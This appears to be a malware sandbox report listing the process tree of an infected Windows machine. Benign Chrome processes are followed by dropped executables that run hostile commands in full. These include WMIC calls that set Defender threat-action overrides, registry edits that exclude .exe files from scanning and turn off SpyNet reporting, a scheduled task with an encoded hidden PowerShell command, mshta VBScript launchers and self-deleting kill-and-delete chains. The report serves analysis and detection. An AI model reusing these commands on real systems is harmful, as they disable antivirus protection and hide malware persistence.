C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:19⤵PID:10404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:19⤵PID:10448
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:89⤵PID:10660
-
C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel=stable --force-configure-user-settings9⤵PID:7060
-
C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff634e26ee0,0x7ff634e26ef0,0x7ff634e26f0010⤵PID:11696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:89⤵PID:11688
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4220 /prefetch:29⤵PID:11852
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1984 /prefetch:89⤵PID:11828
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:89⤵PID:4320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:89⤵PID:6440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:89⤵PID:4844
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:89⤵PID:7084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3932 /prefetch:89⤵PID:12104
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:89⤵PID:1004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:89⤵PID:11696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 /prefetch:89⤵PID:9360
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:89⤵PID:12400
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3744 /prefetch:89⤵PID:11968
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3952 /prefetch:89⤵PID:8752
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 /prefetch:89⤵PID:12912
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3944 /prefetch:89⤵PID:12192
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3908 /prefetch:89⤵PID:12916
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6076 /prefetch:89⤵PID:2204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3872 /prefetch:89⤵PID:8392
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6468 /prefetch:89⤵PID:7476
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1692 /prefetch:89⤵PID:9936
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:89⤵PID:12848
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:89⤵PID:6208
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:89⤵PID:11204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6900 /prefetch:89⤵PID:10452
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:89⤵PID:9880
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3348 /prefetch:89⤵PID:11636
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4352 /prefetch:89⤵PID:17836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:89⤵PID:1464
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6880 /prefetch:89⤵PID:18632
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6192 /prefetch:89⤵PID:18688
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1964 /prefetch:89⤵PID:18764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7064 /prefetch:89⤵PID:19052
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 /prefetch:89⤵PID:19196
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3788 /prefetch:89⤵PID:19120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:19⤵PID:13268
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:19⤵PID:13040
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"8⤵PID:9688
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 75289⤵
- Kills process with taskkill
PID:10552 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"8⤵PID:10916
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 75289⤵
- Kills process with taskkill
PID:12316 -
C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe"C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:7508 -
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"8⤵
- Checks computer location settings
PID:9884 -
C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe"C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe"9⤵PID:3760
-
C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe"C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe"9⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\7zSCEEA.tmp\Install.exe.\Install.exe10⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\7zSD1A9.tmp\Install.exe.\Install.exe /S /site_id "668658"11⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:6708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &12⤵PID:8700
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
- Checks processor information in registry
PID:8580 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:10460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:11124
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:4920
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:6872
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:4544
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:11624
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:11908
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:17064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:17076
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:16852
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"13⤵PID:11972
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:16868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:11188
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:15720
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵PID:5280
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵PID:10896
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵PID:12176
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵PID:1180
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"12⤵PID:10492
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&13⤵
- Blocklisted process makes network request
PID:4752 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3214⤵PID:12204
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6414⤵PID:9572
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gydHPhxEz" /SC once /ST 06:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
PID:11060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gydHPhxEz"12⤵PID:11920
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gydHPhxEz"12⤵PID:12504
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 21:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe\" XY /site_id 668658 /S" /V1 /F12⤵
- Creates scheduled task(s)
PID:12348 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bEwGusBEGbIeKSSfjR"12⤵PID:15292
-
C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"9⤵PID:9608
-
C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"10⤵
- Modifies data under HKEY_USERS
PID:16744 -
C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"9⤵PID:1604
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )10⤵PID:9976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" ) do taskkill -iM "%~nxq" /f11⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXeroBCqJOQYC.eXe -P0_6X2fnCLFU6G12⤵PID:7076
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRiPT:closE (creatEOBJeCT( "WscriPT.shEll"). RUN("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " ,0 , TrUe ) )13⤵PID:10272
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe&& sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f14⤵PID:9384
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs13⤵
- Loads dropped DLL
PID:1148 -
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "U0_ScxFgwNG5I8y9H9sWqx5C.exe" /f12⤵
- Kills process with taskkill
PID:11152 -
C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe"C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5664 -
C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe"C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe"9⤵PID:9780
-
C:\ProgramData\7714914.exe"C:\ProgramData\7714914.exe"10⤵PID:2104
-
